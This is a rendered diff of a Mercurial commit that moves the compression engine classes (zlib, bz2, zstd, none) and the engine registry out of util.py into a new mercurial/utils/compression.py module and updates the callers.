##// END OF EJS Templates
util: extract compression code in `mercurial.utils.compression`...
marmoute -
r42208:3e47d1ec default
parent child Browse files
Show More
@@ -82,6 +82,7 b' from . import ('
82 )
82 )
83 from .utils import (
83 from .utils import (
84 cborutil,
84 cborutil,
85 compression,
85 dateutil,
86 dateutil,
86 procutil,
87 procutil,
87 stringutil,
88 stringutil,
@@ -1299,7 +1300,8 b' def debuginstall(ui, **opts):'
1299 fm.formatlist(sorted(e.name() for e in compengines
1300 fm.formatlist(sorted(e.name() for e in compengines
1300 if e.available()),
1301 if e.available()),
1301 name='compengine', fmt='%s', sep=', '))
1302 name='compengine', fmt='%s', sep=', '))
1302 wirecompengines = util.compengines.supportedwireengines(util.SERVERROLE)
1303 wirecompengines = compression.compengines.supportedwireengines(
1304 compression.SERVERROLE)
1303 fm.write('compenginesserver', _('checking available compression engines '
1305 fm.write('compenginesserver', _('checking available compression engines '
1304 'for wire protocol (%s)\n'),
1306 'for wire protocol (%s)\n'),
1305 fm.formatlist([e.name() for e in wirecompengines
1307 fm.formatlist([e.name() for e in wirecompengines
@@ -37,6 +37,9 b' from . import ('
37 from .hgweb import (
37 from .hgweb import (
38 webcommands,
38 webcommands,
39 )
39 )
40 from .utils import (
41 compression,
42 )
40
43
41 _exclkeywords = {
44 _exclkeywords = {
42 "(ADVANCED)",
45 "(ADVANCED)",
@@ -428,7 +431,7 b' def addtopicsymbols(topic, marker, symbo'
428 addtopichook(topic, add)
431 addtopichook(topic, add)
429
432
430 addtopicsymbols('bundlespec', '.. bundlecompressionmarker',
433 addtopicsymbols('bundlespec', '.. bundlecompressionmarker',
431 util.bundlecompressiontopics())
434 compression.bundlecompressiontopics())
432 addtopicsymbols('filesets', '.. predicatesmarker', fileset.symbols)
435 addtopicsymbols('filesets', '.. predicatesmarker', fileset.symbols)
433 addtopicsymbols('merge-tools', '.. internaltoolsmarker',
436 addtopicsymbols('merge-tools', '.. internaltoolsmarker',
434 filemerge.internalsdoc)
437 filemerge.internalsdoc)
This diff has been collapsed as it changes many lines, (716 lines changed) Show them Hide them
@@ -16,7 +16,6 b' hide platform-specific details from the '
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
20 import collections
19 import collections
21 import contextlib
20 import contextlib
22 import errno
21 import errno
@@ -34,7 +33,6 b' import sys'
34 import time
33 import time
35 import traceback
34 import traceback
36 import warnings
35 import warnings
37 import zlib
38
36
39 from .thirdparty import (
37 from .thirdparty import (
40 attr,
38 attr,
@@ -50,6 +48,7 b' from . import ('
50 urllibcompat,
48 urllibcompat,
51 )
49 )
52 from .utils import (
50 from .utils import (
51 compression,
53 procutil,
52 procutil,
54 stringutil,
53 stringutil,
55 )
54 )
@@ -127,6 +126,11 b' umask = platform.umask'
127 unlink = platform.unlink
126 unlink = platform.unlink
128 username = platform.username
127 username = platform.username
129
128
129 # small compat layer
130 compengines = compression.compengines
131 SERVERROLE = compression.SERVERROLE
132 CLIENTROLE = compression.CLIENTROLE
133
130 try:
134 try:
131 recvfds = osutil.recvfds
135 recvfds = osutil.recvfds
132 except AttributeError:
136 except AttributeError:
@@ -3206,714 +3210,6 b' def finddirs(path):'
3206 yield path[:pos]
3210 yield path[:pos]
3207 pos = path.rfind('/', 0, pos)
3211 pos = path.rfind('/', 0, pos)
3208
3212
3209 # compression code
3210
3211 SERVERROLE = 'server'
3212 CLIENTROLE = 'client'
3213
3214 compewireprotosupport = collections.namedtuple(r'compenginewireprotosupport',
3215 (r'name', r'serverpriority',
3216 r'clientpriority'))
3217
3218 class compressormanager(object):
3219 """Holds registrations of various compression engines.
3220
3221 This class essentially abstracts the differences between compression
3222 engines to allow new compression formats to be added easily, possibly from
3223 extensions.
3224
3225 Compressors are registered against the global instance by calling its
3226 ``register()`` method.
3227 """
3228 def __init__(self):
3229 self._engines = {}
3230 # Bundle spec human name to engine name.
3231 self._bundlenames = {}
3232 # Internal bundle identifier to engine name.
3233 self._bundletypes = {}
3234 # Revlog header to engine name.
3235 self._revlogheaders = {}
3236 # Wire proto identifier to engine name.
3237 self._wiretypes = {}
3238
3239 def __getitem__(self, key):
3240 return self._engines[key]
3241
3242 def __contains__(self, key):
3243 return key in self._engines
3244
3245 def __iter__(self):
3246 return iter(self._engines.keys())
3247
3248 def register(self, engine):
3249 """Register a compression engine with the manager.
3250
3251 The argument must be a ``compressionengine`` instance.
3252 """
3253 if not isinstance(engine, compressionengine):
3254 raise ValueError(_('argument must be a compressionengine'))
3255
3256 name = engine.name()
3257
3258 if name in self._engines:
3259 raise error.Abort(_('compression engine %s already registered') %
3260 name)
3261
3262 bundleinfo = engine.bundletype()
3263 if bundleinfo:
3264 bundlename, bundletype = bundleinfo
3265
3266 if bundlename in self._bundlenames:
3267 raise error.Abort(_('bundle name %s already registered') %
3268 bundlename)
3269 if bundletype in self._bundletypes:
3270 raise error.Abort(_('bundle type %s already registered by %s') %
3271 (bundletype, self._bundletypes[bundletype]))
3272
3273 # No external facing name declared.
3274 if bundlename:
3275 self._bundlenames[bundlename] = name
3276
3277 self._bundletypes[bundletype] = name
3278
3279 wiresupport = engine.wireprotosupport()
3280 if wiresupport:
3281 wiretype = wiresupport.name
3282 if wiretype in self._wiretypes:
3283 raise error.Abort(_('wire protocol compression %s already '
3284 'registered by %s') %
3285 (wiretype, self._wiretypes[wiretype]))
3286
3287 self._wiretypes[wiretype] = name
3288
3289 revlogheader = engine.revlogheader()
3290 if revlogheader and revlogheader in self._revlogheaders:
3291 raise error.Abort(_('revlog header %s already registered by %s') %
3292 (revlogheader, self._revlogheaders[revlogheader]))
3293
3294 if revlogheader:
3295 self._revlogheaders[revlogheader] = name
3296
3297 self._engines[name] = engine
3298
3299 @property
3300 def supportedbundlenames(self):
3301 return set(self._bundlenames.keys())
3302
3303 @property
3304 def supportedbundletypes(self):
3305 return set(self._bundletypes.keys())
3306
3307 def forbundlename(self, bundlename):
3308 """Obtain a compression engine registered to a bundle name.
3309
3310 Will raise KeyError if the bundle type isn't registered.
3311
3312 Will abort if the engine is known but not available.
3313 """
3314 engine = self._engines[self._bundlenames[bundlename]]
3315 if not engine.available():
3316 raise error.Abort(_('compression engine %s could not be loaded') %
3317 engine.name())
3318 return engine
3319
3320 def forbundletype(self, bundletype):
3321 """Obtain a compression engine registered to a bundle type.
3322
3323 Will raise KeyError if the bundle type isn't registered.
3324
3325 Will abort if the engine is known but not available.
3326 """
3327 engine = self._engines[self._bundletypes[bundletype]]
3328 if not engine.available():
3329 raise error.Abort(_('compression engine %s could not be loaded') %
3330 engine.name())
3331 return engine
3332
3333 def supportedwireengines(self, role, onlyavailable=True):
3334 """Obtain compression engines that support the wire protocol.
3335
3336 Returns a list of engines in prioritized order, most desired first.
3337
3338 If ``onlyavailable`` is set, filter out engines that can't be
3339 loaded.
3340 """
3341 assert role in (SERVERROLE, CLIENTROLE)
3342
3343 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3344
3345 engines = [self._engines[e] for e in self._wiretypes.values()]
3346 if onlyavailable:
3347 engines = [e for e in engines if e.available()]
3348
3349 def getkey(e):
3350 # Sort first by priority, highest first. In case of tie, sort
3351 # alphabetically. This is arbitrary, but ensures output is
3352 # stable.
3353 w = e.wireprotosupport()
3354 return -1 * getattr(w, attr), w.name
3355
3356 return list(sorted(engines, key=getkey))
3357
3358 def forwiretype(self, wiretype):
3359 engine = self._engines[self._wiretypes[wiretype]]
3360 if not engine.available():
3361 raise error.Abort(_('compression engine %s could not be loaded') %
3362 engine.name())
3363 return engine
3364
3365 def forrevlogheader(self, header):
3366 """Obtain a compression engine registered to a revlog header.
3367
3368 Will raise KeyError if the revlog header value isn't registered.
3369 """
3370 return self._engines[self._revlogheaders[header]]
3371
3372 compengines = compressormanager()
3373
3374 class compressionengine(object):
3375 """Base class for compression engines.
3376
3377 Compression engines must implement the interface defined by this class.
3378 """
3379 def name(self):
3380 """Returns the name of the compression engine.
3381
3382 This is the key the engine is registered under.
3383
3384 This method must be implemented.
3385 """
3386 raise NotImplementedError()
3387
3388 def available(self):
3389 """Whether the compression engine is available.
3390
3391 The intent of this method is to allow optional compression engines
3392 that may not be available in all installations (such as engines relying
3393 on C extensions that may not be present).
3394 """
3395 return True
3396
3397 def bundletype(self):
3398 """Describes bundle identifiers for this engine.
3399
3400 If this compression engine isn't supported for bundles, returns None.
3401
3402 If this engine can be used for bundles, returns a 2-tuple of strings of
3403 the user-facing "bundle spec" compression name and an internal
3404 identifier used to denote the compression format within bundles. To
3405 exclude the name from external usage, set the first element to ``None``.
3406
3407 If bundle compression is supported, the class must also implement
3408 ``compressstream`` and `decompressorreader``.
3409
3410 The docstring of this method is used in the help system to tell users
3411 about this engine.
3412 """
3413 return None
3414
3415 def wireprotosupport(self):
3416 """Declare support for this compression format on the wire protocol.
3417
3418 If this compression engine isn't supported for compressing wire
3419 protocol payloads, returns None.
3420
3421 Otherwise, returns ``compenginewireprotosupport`` with the following
3422 fields:
3423
3424 * String format identifier
3425 * Integer priority for the server
3426 * Integer priority for the client
3427
3428 The integer priorities are used to order the advertisement of format
3429 support by server and client. The highest integer is advertised
3430 first. Integers with non-positive values aren't advertised.
3431
3432 The priority values are somewhat arbitrary and only used for default
3433 ordering. The relative order can be changed via config options.
3434
3435 If wire protocol compression is supported, the class must also implement
3436 ``compressstream`` and ``decompressorreader``.
3437 """
3438 return None
3439
3440 def revlogheader(self):
3441 """Header added to revlog chunks that identifies this engine.
3442
3443 If this engine can be used to compress revlogs, this method should
3444 return the bytes used to identify chunks compressed with this engine.
3445 Else, the method should return ``None`` to indicate it does not
3446 participate in revlog compression.
3447 """
3448 return None
3449
3450 def compressstream(self, it, opts=None):
3451 """Compress an iterator of chunks.
3452
3453 The method receives an iterator (ideally a generator) of chunks of
3454 bytes to be compressed. It returns an iterator (ideally a generator)
3455 of bytes of chunks representing the compressed output.
3456
3457 Optionally accepts an argument defining how to perform compression.
3458 Each engine treats this argument differently.
3459 """
3460 raise NotImplementedError()
3461
3462 def decompressorreader(self, fh):
3463 """Perform decompression on a file object.
3464
3465 Argument is an object with a ``read(size)`` method that returns
3466 compressed data. Return value is an object with a ``read(size)`` that
3467 returns uncompressed data.
3468 """
3469 raise NotImplementedError()
3470
3471 def revlogcompressor(self, opts=None):
3472 """Obtain an object that can be used to compress revlog entries.
3473
3474 The object has a ``compress(data)`` method that compresses binary
3475 data. This method returns compressed binary data or ``None`` if
3476 the data could not be compressed (too small, not compressible, etc).
3477 The returned data should have a header uniquely identifying this
3478 compression format so decompression can be routed to this engine.
3479 This header should be identified by the ``revlogheader()`` return
3480 value.
3481
3482 The object has a ``decompress(data)`` method that decompresses
3483 data. The method will only be called if ``data`` begins with
3484 ``revlogheader()``. The method should return the raw, uncompressed
3485 data or raise a ``StorageError``.
3486
3487 The object is reusable but is not thread safe.
3488 """
3489 raise NotImplementedError()
3490
3491 class _CompressedStreamReader(object):
3492 def __init__(self, fh):
3493 if safehasattr(fh, 'unbufferedread'):
3494 self._reader = fh.unbufferedread
3495 else:
3496 self._reader = fh.read
3497 self._pending = []
3498 self._pos = 0
3499 self._eof = False
3500
3501 def _decompress(self, chunk):
3502 raise NotImplementedError()
3503
3504 def read(self, l):
3505 buf = []
3506 while True:
3507 while self._pending:
3508 if len(self._pending[0]) > l + self._pos:
3509 newbuf = self._pending[0]
3510 buf.append(newbuf[self._pos:self._pos + l])
3511 self._pos += l
3512 return ''.join(buf)
3513
3514 newbuf = self._pending.pop(0)
3515 if self._pos:
3516 buf.append(newbuf[self._pos:])
3517 l -= len(newbuf) - self._pos
3518 else:
3519 buf.append(newbuf)
3520 l -= len(newbuf)
3521 self._pos = 0
3522
3523 if self._eof:
3524 return ''.join(buf)
3525 chunk = self._reader(65536)
3526 self._decompress(chunk)
3527 if not chunk and not self._pending and not self._eof:
3528 # No progress and no new data, bail out
3529 return ''.join(buf)
3530
3531 class _GzipCompressedStreamReader(_CompressedStreamReader):
3532 def __init__(self, fh):
3533 super(_GzipCompressedStreamReader, self).__init__(fh)
3534 self._decompobj = zlib.decompressobj()
3535 def _decompress(self, chunk):
3536 newbuf = self._decompobj.decompress(chunk)
3537 if newbuf:
3538 self._pending.append(newbuf)
3539 d = self._decompobj.copy()
3540 try:
3541 d.decompress('x')
3542 d.flush()
3543 if d.unused_data == 'x':
3544 self._eof = True
3545 except zlib.error:
3546 pass
3547
3548 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3549 def __init__(self, fh):
3550 super(_BZ2CompressedStreamReader, self).__init__(fh)
3551 self._decompobj = bz2.BZ2Decompressor()
3552 def _decompress(self, chunk):
3553 newbuf = self._decompobj.decompress(chunk)
3554 if newbuf:
3555 self._pending.append(newbuf)
3556 try:
3557 while True:
3558 newbuf = self._decompobj.decompress('')
3559 if newbuf:
3560 self._pending.append(newbuf)
3561 else:
3562 break
3563 except EOFError:
3564 self._eof = True
3565
3566 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3567 def __init__(self, fh):
3568 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3569 newbuf = self._decompobj.decompress('BZ')
3570 if newbuf:
3571 self._pending.append(newbuf)
3572
3573 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3574 def __init__(self, fh, zstd):
3575 super(_ZstdCompressedStreamReader, self).__init__(fh)
3576 self._zstd = zstd
3577 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3578 def _decompress(self, chunk):
3579 newbuf = self._decompobj.decompress(chunk)
3580 if newbuf:
3581 self._pending.append(newbuf)
3582 try:
3583 while True:
3584 newbuf = self._decompobj.decompress('')
3585 if newbuf:
3586 self._pending.append(newbuf)
3587 else:
3588 break
3589 except self._zstd.ZstdError:
3590 self._eof = True
3591
3592 class _zlibengine(compressionengine):
3593 def name(self):
3594 return 'zlib'
3595
3596 def bundletype(self):
3597 """zlib compression using the DEFLATE algorithm.
3598
3599 All Mercurial clients should support this format. The compression
3600 algorithm strikes a reasonable balance between compression ratio
3601 and size.
3602 """
3603 return 'gzip', 'GZ'
3604
3605 def wireprotosupport(self):
3606 return compewireprotosupport('zlib', 20, 20)
3607
3608 def revlogheader(self):
3609 return 'x'
3610
3611 def compressstream(self, it, opts=None):
3612 opts = opts or {}
3613
3614 z = zlib.compressobj(opts.get('level', -1))
3615 for chunk in it:
3616 data = z.compress(chunk)
3617 # Not all calls to compress emit data. It is cheaper to inspect
3618 # here than to feed empty chunks through generator.
3619 if data:
3620 yield data
3621
3622 yield z.flush()
3623
3624 def decompressorreader(self, fh):
3625 return _GzipCompressedStreamReader(fh)
3626
3627 class zlibrevlogcompressor(object):
3628 def compress(self, data):
3629 insize = len(data)
3630 # Caller handles empty input case.
3631 assert insize > 0
3632
3633 if insize < 44:
3634 return None
3635
3636 elif insize <= 1000000:
3637 compressed = zlib.compress(data)
3638 if len(compressed) < insize:
3639 return compressed
3640 return None
3641
3642 # zlib makes an internal copy of the input buffer, doubling
3643 # memory usage for large inputs. So do streaming compression
3644 # on large inputs.
3645 else:
3646 z = zlib.compressobj()
3647 parts = []
3648 pos = 0
3649 while pos < insize:
3650 pos2 = pos + 2**20
3651 parts.append(z.compress(data[pos:pos2]))
3652 pos = pos2
3653 parts.append(z.flush())
3654
3655 if sum(map(len, parts)) < insize:
3656 return ''.join(parts)
3657 return None
3658
3659 def decompress(self, data):
3660 try:
3661 return zlib.decompress(data)
3662 except zlib.error as e:
3663 raise error.StorageError(_('revlog decompress error: %s') %
3664 stringutil.forcebytestr(e))
3665
3666 def revlogcompressor(self, opts=None):
3667 return self.zlibrevlogcompressor()
3668
3669 compengines.register(_zlibengine())
3670
3671 class _bz2engine(compressionengine):
3672 def name(self):
3673 return 'bz2'
3674
3675 def bundletype(self):
3676 """An algorithm that produces smaller bundles than ``gzip``.
3677
3678 All Mercurial clients should support this format.
3679
3680 This engine will likely produce smaller bundles than ``gzip`` but
3681 will be significantly slower, both during compression and
3682 decompression.
3683
3684 If available, the ``zstd`` engine can yield similar or better
3685 compression at much higher speeds.
3686 """
3687 return 'bzip2', 'BZ'
3688
3689 # We declare a protocol name but don't advertise by default because
3690 # it is slow.
3691 def wireprotosupport(self):
3692 return compewireprotosupport('bzip2', 0, 0)
3693
3694 def compressstream(self, it, opts=None):
3695 opts = opts or {}
3696 z = bz2.BZ2Compressor(opts.get('level', 9))
3697 for chunk in it:
3698 data = z.compress(chunk)
3699 if data:
3700 yield data
3701
3702 yield z.flush()
3703
3704 def decompressorreader(self, fh):
3705 return _BZ2CompressedStreamReader(fh)
3706
3707 compengines.register(_bz2engine())
3708
3709 class _truncatedbz2engine(compressionengine):
3710 def name(self):
3711 return 'bz2truncated'
3712
3713 def bundletype(self):
3714 return None, '_truncatedBZ'
3715
3716 # We don't implement compressstream because it is hackily handled elsewhere.
3717
3718 def decompressorreader(self, fh):
3719 return _TruncatedBZ2CompressedStreamReader(fh)
3720
3721 compengines.register(_truncatedbz2engine())
3722
3723 class _noopengine(compressionengine):
3724 def name(self):
3725 return 'none'
3726
3727 def bundletype(self):
3728 """No compression is performed.
3729
3730 Use this compression engine to explicitly disable compression.
3731 """
3732 return 'none', 'UN'
3733
3734 # Clients always support uncompressed payloads. Servers don't because
3735 # unless you are on a fast network, uncompressed payloads can easily
3736 # saturate your network pipe.
3737 def wireprotosupport(self):
3738 return compewireprotosupport('none', 0, 10)
3739
3740 # We don't implement revlogheader because it is handled specially
3741 # in the revlog class.
3742
3743 def compressstream(self, it, opts=None):
3744 return it
3745
3746 def decompressorreader(self, fh):
3747 return fh
3748
3749 class nooprevlogcompressor(object):
3750 def compress(self, data):
3751 return None
3752
3753 def revlogcompressor(self, opts=None):
3754 return self.nooprevlogcompressor()
3755
3756 compengines.register(_noopengine())
3757
3758 class _zstdengine(compressionengine):
3759 def name(self):
3760 return 'zstd'
3761
3762 @propertycache
3763 def _module(self):
3764 # Not all installs have the zstd module available. So defer importing
3765 # until first access.
3766 try:
3767 from . import zstd
3768 # Force delayed import.
3769 zstd.__version__
3770 return zstd
3771 except ImportError:
3772 return None
3773
3774 def available(self):
3775 return bool(self._module)
3776
3777 def bundletype(self):
3778 """A modern compression algorithm that is fast and highly flexible.
3779
3780 Only supported by Mercurial 4.1 and newer clients.
3781
3782 With the default settings, zstd compression is both faster and yields
3783 better compression than ``gzip``. It also frequently yields better
3784 compression than ``bzip2`` while operating at much higher speeds.
3785
3786 If this engine is available and backwards compatibility is not a
3787 concern, it is likely the best available engine.
3788 """
3789 return 'zstd', 'ZS'
3790
3791 def wireprotosupport(self):
3792 return compewireprotosupport('zstd', 50, 50)
3793
3794 def revlogheader(self):
3795 return '\x28'
3796
3797 def compressstream(self, it, opts=None):
3798 opts = opts or {}
3799 # zstd level 3 is almost always significantly faster than zlib
3800 # while providing no worse compression. It strikes a good balance
3801 # between speed and compression.
3802 level = opts.get('level', 3)
3803
3804 zstd = self._module
3805 z = zstd.ZstdCompressor(level=level).compressobj()
3806 for chunk in it:
3807 data = z.compress(chunk)
3808 if data:
3809 yield data
3810
3811 yield z.flush()
3812
3813 def decompressorreader(self, fh):
3814 return _ZstdCompressedStreamReader(fh, self._module)
3815
3816 class zstdrevlogcompressor(object):
3817 def __init__(self, zstd, level=3):
3818 # TODO consider omitting frame magic to save 4 bytes.
3819 # This writes content sizes into the frame header. That is
3820 # extra storage. But it allows a correct size memory allocation
3821 # to hold the result.
3822 self._cctx = zstd.ZstdCompressor(level=level)
3823 self._dctx = zstd.ZstdDecompressor()
3824 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3825 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3826
3827 def compress(self, data):
3828 insize = len(data)
3829 # Caller handles empty input case.
3830 assert insize > 0
3831
3832 if insize < 50:
3833 return None
3834
3835 elif insize <= 1000000:
3836 compressed = self._cctx.compress(data)
3837 if len(compressed) < insize:
3838 return compressed
3839 return None
3840 else:
3841 z = self._cctx.compressobj()
3842 chunks = []
3843 pos = 0
3844 while pos < insize:
3845 pos2 = pos + self._compinsize
3846 chunk = z.compress(data[pos:pos2])
3847 if chunk:
3848 chunks.append(chunk)
3849 pos = pos2
3850 chunks.append(z.flush())
3851
3852 if sum(map(len, chunks)) < insize:
3853 return ''.join(chunks)
3854 return None
3855
3856 def decompress(self, data):
3857 insize = len(data)
3858
3859 try:
3860 # This was measured to be faster than other streaming
3861 # decompressors.
3862 dobj = self._dctx.decompressobj()
3863 chunks = []
3864 pos = 0
3865 while pos < insize:
3866 pos2 = pos + self._decompinsize
3867 chunk = dobj.decompress(data[pos:pos2])
3868 if chunk:
3869 chunks.append(chunk)
3870 pos = pos2
3871 # Frame should be exhausted, so no finish() API.
3872
3873 return ''.join(chunks)
3874 except Exception as e:
3875 raise error.StorageError(_('revlog decompress error: %s') %
3876 stringutil.forcebytestr(e))
3877
3878 def revlogcompressor(self, opts=None):
3879 opts = opts or {}
3880 return self.zstdrevlogcompressor(self._module,
3881 level=opts.get('level', 3))
3882
3883 compengines.register(_zstdengine())
3884
3885 def bundlecompressiontopics():
3886 """Obtains a list of available bundle compressions for use in help."""
3887 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3888 items = {}
3889
3890 # We need to format the docstring. So use a dummy object/type to hold it
3891 # rather than mutating the original.
3892 class docobject(object):
3893 pass
3894
3895 for name in compengines:
3896 engine = compengines[name]
3897
3898 if not engine.available():
3899 continue
3900
3901 bt = engine.bundletype()
3902 if not bt or not bt[0]:
3903 continue
3904
3905 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3906
3907 value = docobject()
3908 value.__doc__ = pycompat.sysstr(doc)
3909 value._origdoc = engine.bundletype.__doc__
3910 value._origfunc = engine.bundletype
3911
3912 items[bt[0]] = value
3913
3914 return items
3915
3916 i18nfunctions = bundlecompressiontopics().values()
3917
3213
3918 # convenient shortcut
3214 # convenient shortcut
3919 dst = debugstacktrace
3215 dst = debugstacktrace
This diff has been collapsed as it changes many lines, (3296 lines changed) Show them Hide them
@@ -1,1555 +1,37 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # compression.py - Mercurial utility functions for compression
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
2 #
7 # This software may be used and distributed according to the terms of the
3 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
4 # GNU General Public License version 2 or any later version.
9
5
10 """Mercurial utility functions and platform specific implementations.
11
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
14 """
15
6
16 from __future__ import absolute_import, print_function
7 from __future__ import absolute_import, print_function
17
8
18 import abc
19 import bz2
9 import bz2
20 import collections
10 import collections
21 import contextlib
22 import errno
23 import gc
24 import hashlib
25 import itertools
26 import mmap
27 import os
28 import platform as pyplatform
29 import re as remod
30 import shutil
31 import socket
32 import stat
33 import sys
34 import time
35 import traceback
36 import warnings
37 import zlib
11 import zlib
38
12
39 from .thirdparty import (
13 from .. import (
40 attr,
41 )
42 from hgdemandimport import tracing
43 from . import (
44 encoding,
45 error,
14 error,
46 i18n,
15 i18n,
47 node as nodemod,
48 policy,
49 pycompat,
16 pycompat,
50 urllibcompat,
51 )
17 )
52 from .utils import (
18 from . import (
53 procutil,
54 stringutil,
19 stringutil,
55 )
20 )
56
21
57 base85 = policy.importmod(r'base85')
22 safehasattr = pycompat.safehasattr
58 osutil = policy.importmod(r'osutil')
59 parsers = policy.importmod(r'parsers')
60
61 b85decode = base85.b85decode
62 b85encode = base85.b85encode
63
23
64 cookielib = pycompat.cookielib
65 httplib = pycompat.httplib
66 pickle = pycompat.pickle
67 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
73
74 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
77
78 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
80
81 if pycompat.iswindows:
82 from . import windows as platform
83 else:
84 from . import posix as platform
85
24
86 _ = i18n._
25 _ = i18n._
87
26
88 bindunixsocket = platform.bindunixsocket
27 # compression code
89 cachestat = platform.cachestat
90 checkexec = platform.checkexec
91 checklink = platform.checklink
92 copymode = platform.copymode
93 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
97 groupname = platform.groupname
98 isexec = platform.isexec
99 isowner = platform.isowner
100 listdir = osutil.listdir
101 localpath = platform.localpath
102 lookupreg = platform.lookupreg
103 makedir = platform.makedir
104 nlinks = platform.nlinks
105 normpath = platform.normpath
106 normcase = platform.normcase
107 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
113 poll = platform.poll
114 posixfile = platform.posixfile
115 readlink = platform.readlink
116 rename = platform.rename
117 removedirs = platform.removedirs
118 samedevice = platform.samedevice
119 samefile = platform.samefile
120 samestat = platform.samestat
121 setflags = platform.setflags
122 split = platform.split
123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 statisexec = platform.statisexec
125 statislink = platform.statislink
126 umask = platform.umask
127 unlink = platform.unlink
128 username = platform.username
129
130 try:
131 recvfds = osutil.recvfds
132 except AttributeError:
133 pass
134
135 # Python compatibility
136
137 _notset = object()
138
139 def bitsfrom(container):
140 bits = 0
141 for bit in container:
142 bits |= bit
143 return bits
144
145 # python 2.6 still have deprecation warning enabled by default. We do not want
146 # to display anything to standard user so detect if we are running test and
147 # only use python deprecation warning in this case.
148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 if _dowarn:
150 # explicitly unfilter our warning for python 2.7
151 #
152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 if _dowarn and pycompat.ispy3:
160 # silence warning emitted by passing user string to re.sub()
161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 r'mercurial')
163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 DeprecationWarning, r'mercurial')
165 # TODO: reinvent imp.is_frozen()
166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 DeprecationWarning, r'mercurial')
168
169 def nouideprecwarn(msg, version, stacklevel=1):
170 """Issue an python native deprecation warning
171
172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 """
174 if _dowarn:
175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 " update your code.)") % version
177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178
179 DIGESTS = {
180 'md5': hashlib.md5,
181 'sha1': hashlib.sha1,
182 'sha512': hashlib.sha512,
183 }
184 # List of digest types from strongest to weakest
185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186
187 for k in DIGESTS_BY_STRENGTH:
188 assert k in DIGESTS
189
190 class digester(object):
191 """helper to compute digests.
192
193 This helper can be used to compute one or more digests given their name.
194
195 >>> d = digester([b'md5', b'sha1'])
196 >>> d.update(b'foo')
197 >>> [k for k in sorted(d)]
198 ['md5', 'sha1']
199 >>> d[b'md5']
200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 >>> d[b'sha1']
202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 >>> digester.preferred([b'md5', b'sha1'])
204 'sha1'
205 """
206
207 def __init__(self, digests, s=''):
208 self._hashes = {}
209 for k in digests:
210 if k not in DIGESTS:
211 raise error.Abort(_('unknown digest type: %s') % k)
212 self._hashes[k] = DIGESTS[k]()
213 if s:
214 self.update(s)
215
216 def update(self, data):
217 for h in self._hashes.values():
218 h.update(data)
219
220 def __getitem__(self, key):
221 if key not in DIGESTS:
222 raise error.Abort(_('unknown digest type: %s') % k)
223 return nodemod.hex(self._hashes[key].digest())
224
225 def __iter__(self):
226 return iter(self._hashes)
227
228 @staticmethod
229 def preferred(supported):
230 """returns the strongest digest type in both supported and DIGESTS."""
231
232 for k in DIGESTS_BY_STRENGTH:
233 if k in supported:
234 return k
235 return None
236
237 class digestchecker(object):
238 """file handle wrapper that additionally checks content against a given
239 size and digests.
240
241 d = digestchecker(fh, size, {'md5': '...'})
242
243 When multiple digests are given, all of them are validated.
244 """
245
246 def __init__(self, fh, size, digests):
247 self._fh = fh
248 self._size = size
249 self._got = 0
250 self._digests = dict(digests)
251 self._digester = digester(self._digests.keys())
252
253 def read(self, length=-1):
254 content = self._fh.read(length)
255 self._digester.update(content)
256 self._got += len(content)
257 return content
258
259 def validate(self):
260 if self._size != self._got:
261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 (self._size, self._got))
263 for k, v in self._digests.items():
264 if v != self._digester[k]:
265 # i18n: first parameter is a digest name
266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 (k, v, self._digester[k]))
268
269 try:
270 buffer = buffer
271 except NameError:
272 def buffer(sliceable, offset=0, length=None):
273 if length is not None:
274 return memoryview(sliceable)[offset:offset + length]
